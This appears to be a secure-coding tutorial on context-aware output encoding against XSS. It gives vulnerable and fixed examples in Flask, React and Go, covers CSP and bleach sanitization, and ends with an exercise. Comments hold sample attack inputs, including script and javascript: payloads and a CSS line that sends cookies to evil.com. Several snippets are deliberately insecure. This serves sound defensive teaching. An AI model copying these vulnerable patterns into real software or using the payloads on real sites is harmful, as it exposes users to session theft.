Output Encoding
Learn context-aware output encoding to prevent XSS, injection attacks, and data leakage.
Output encoding is the counterpart to input validation. While input validation controls what comes into your application, output encoding ensures data is safely rendered in different contexts. The most common vulnerability prevented by proper output encoding is Cross-Site Scripting (XSS).
The Problem: Context Matters
The same data requires different encoding depending on where it's rendered:
<!-- Same user input, different contexts -->
<p>Hello, USER_INPUT</p> <!-- HTML context -->
<a href="/search?q=USER_INPUT">Link</a> <!-- URL context -->
<script>var name = 'USER_INPUT';</script> <!-- JavaScript context -->
<style>body { font: USER_INPUT; }</style> <!-- CSS context -->
Each context has different dangerous characters and requires different encoding.
Cross-Site Scripting (XSS) Types
Reflected XSS
Attack payload is in the request and immediately reflected in the response:
# VULNERABLE
@app.route('/search')
def search():
query = request.args.get('q', '')
return f"<h1>Results for: {query}</h1>" # Attacker: <script>alert('XSS')</script>
Stored XSS
Attack payload is stored in the database and served to other users:
# VULNERABLE
@app.route('/comment', methods=['POST'])
def add_comment():
comment = request.form['comment']
db.save_comment(comment) # Stored in database
return redirect('/comments') # Served to all visitors
DOM-Based XSS
Vulnerability exists in client-side JavaScript:
// VULNERABLE
const name = new URLSearchParams(window.location.search).get('name');
document.getElementById('greeting').innerHTML = 'Hello, ' + name;
Context-Aware Encoding
HTML Context Encoding
Encode these characters when inserting into HTML element content:
| Character | Encoding |
|---|---|
< |
< |
> |
> |
& |
& |
" |
" |
' |
' |
import html
# SECURE: Using built-in HTML escaping
def safe_html_output(user_input):
return f"<p>Hello, {html.escape(user_input)}</p>"
# With a template engine (preferred)
# Jinja2 auto-escapes by default
# {{ user_input }} <-- automatically escaped
HTML Attribute Encoding
Extra care needed for attributes, especially unquoted ones:
# DANGEROUS: Unquoted attribute
f'<input value={user_input}>' # Attacker: x onclick=alert(1)
# SAFER: Quoted + escaped
f'<input value="{html.escape(user_input, quote=True)}">'
# SAFEST: Avoid dynamic attributes when possible
URL Encoding
When inserting user input into URLs:
from urllib.parse import quote, urlencode
# Encoding a single value
def safe_url_param(value):
return quote(value, safe='') # Encode everything
# Building a query string
def build_search_url(query, page):
params = urlencode({'q': query, 'page': page})
return f"/search?{params}"
# DANGEROUS: User input in href without validation
# Could allow javascript: URLs
f'<a href="{user_input}">Click</a>' # Attacker: javascript:alert(1)
# SECURE: Validate URL scheme
def safe_link(url):
from urllib.parse import urlparse
parsed = urlparse(url)
if parsed.scheme not in ('http', 'https', ''):
return '#' # Block dangerous schemes
return html.escape(url)
JavaScript Context Encoding
Inserting data into JavaScript requires JSON encoding:
import json
# SECURE: JSON encoding for JavaScript context
@app.route('/page')
def page():
user_data = {'name': request.args.get('name', '')}
return f'''
<script>
const userData = {json.dumps(user_data)};
console.log(userData.name);
</script>
'''
# In Jinja2, use the tojson filter
# <script>const data = {{ user_data | tojson }};</script>
Never do this:
# VULNERABLE: String interpolation in JavaScript
f"<script>var name = '{user_input}';</script>" # Attacker: '; alert('XSS'); //
CSS Context Encoding
Avoid putting user input in CSS when possible:
# DANGEROUS: User input in CSS
f'<div style="color: {user_input}">' # Attacker: red; background: url(evil.com/steal?cookie=...)
# SAFER: Validate against allowlist
ALLOWED_COLORS = {'red', 'blue', 'green', 'black', 'white'}
def safe_color(color):
if color.lower() in ALLOWED_COLORS:
return color.lower()
return 'black' # Default safe value
Framework-Level Protection
Modern frameworks provide automatic encoding:
Python (Flask/Jinja2)
from flask import Flask, render_template
from markupsafe import escape, Markup
app = Flask(__name__)
@app.route('/hello/<name>')
def hello(name):
# render_template auto-escapes by default
return render_template('hello.html', name=name)
# Manual escaping if not using templates
return f"Hello, {escape(name)}!"
# If you need to render raw HTML (be VERY careful)
trusted_html = Markup('<strong>Safe HTML</strong>')
JavaScript (React)
// React escapes by default
function Greeting({ name }) {
return <h1>Hello, {name}</h1>; // Safe - auto-escaped
}
// DANGEROUS: dangerouslySetInnerHTML bypasses protection
function RawHtml({ content }) {
// Only use with sanitized content
return <div dangerouslySetInnerHTML={{ __html: content }} />;
}
Go
package main
import (
"html/template"
"net/http"
)
func handler(w http.ResponseWriter, r *http.Request) {
name := r.URL.Query().Get("name")
// html/template auto-escapes based on context
tmpl := template.Must(template.New("hello").Parse(
`<h1>Hello, {{.Name}}!</h1>`)) // Safe
tmpl.Execute(w, struct{ Name string }{name})
}
Content Security Policy (CSP)
CSP is a defense-in-depth mechanism that mitigates XSS even if encoding fails:
# Add CSP header
@app.after_request
def add_security_headers(response):
response.headers['Content-Security-Policy'] = (
"default-src 'self'; "
"script-src 'self'; "
"style-src 'self' 'unsafe-inline'; "
"img-src 'self' data: https:; "
"frame-ancestors 'none';"
)
return response
Key CSP directives:
default-src 'self'- Only allow resources from same originscript-src 'self'- Only allow scripts from same origin (blocks inline scripts)frame-ancestors 'none'- Prevent clickjacking
HTML Sanitization for Rich Content
When you need to allow some HTML (e.g., rich text editors):
import bleach
ALLOWED_TAGS = ['p', 'br', 'strong', 'em', 'ul', 'ol', 'li', 'a']
ALLOWED_ATTRIBUTES = {'a': ['href', 'title']}
def sanitize_rich_text(html_content):
"""Sanitize user HTML, keeping only safe tags."""
return bleach.clean(
html_content,
tags=ALLOWED_TAGS,
attributes=ALLOWED_ATTRIBUTES,
strip=True
)
# Also validate link URLs
def sanitize_with_link_check(html_content):
def check_url(tag, name, value):
if tag == 'a' and name == 'href':
# Only allow http/https links
if not value.startswith(('http://', 'https://', '/')):
return False
return True
return bleach.clean(
html_content,
tags=ALLOWED_TAGS,
attributes={'a': check_url},
strip=True
)
Key Takeaways
- Context matters - Different contexts require different encoding
- Use framework auto-escaping - Don't disable it without good reason
- Encode on output - Not on input (you don't know the output context at input time)
- Be extra careful with:
innerHTML/dangerouslySetInnerHTML- Template
| safe/Markup()/{!! !!}filters - URL schemes in
hrefattributes - User input in JavaScript contexts
- Add CSP headers - Defense in depth
- Use sanitization libraries - For rich text, use proven libraries like bleach or DOMPurify
Practice Exercise
Identify the XSS vulnerabilities and fix them:
<!-- Template: search_results.html -->
<h1>Search results for: {{ query | safe }}</h1>
<script></script>
<a href="{{ next_url }}">Next Page</a>
{% for result in results %}
<div class="result" style="border-color: {{ result.color }}">
<h2>{{ result.title | safe }}</h2>
<p>{{ result.description }}</p>
</div>
{% endfor %}
Hints:
| safefilter disables escaping - is it needed?- What if
querycontains a quote? - What if
next_urlisjavascript:...? - What if
result.colorcontains malicious CSS?
Found an issue?